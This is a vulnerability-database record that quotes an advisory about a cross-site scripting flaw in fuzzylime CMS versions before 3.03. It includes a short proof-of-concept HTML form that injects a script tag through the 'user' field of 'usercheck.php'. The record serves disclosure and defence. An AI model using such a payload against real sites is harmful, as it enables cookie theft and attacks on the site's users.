{"lastseen": "2017-11-19T16:24:52", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"vector": "NONE", "value": 4.3}, "vulnersScore": 4.3}, "href": "https://www.seebug.org/vuldb/ssvid-85691", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:85691", "title": "fuzzylime (cms) 3.0 'usercheck.php' Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 0, "sourceData": "\n source: http://www.securityfocus.com/bid/31306/info\r\n\r\nfuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nExploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.\r\n\r\nVersions prior to fuzzylime (cms) 3.03 are vulnerable. \r\n\r\n<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85691", "type": "seebug", "objectVersion": "1.4"}

{}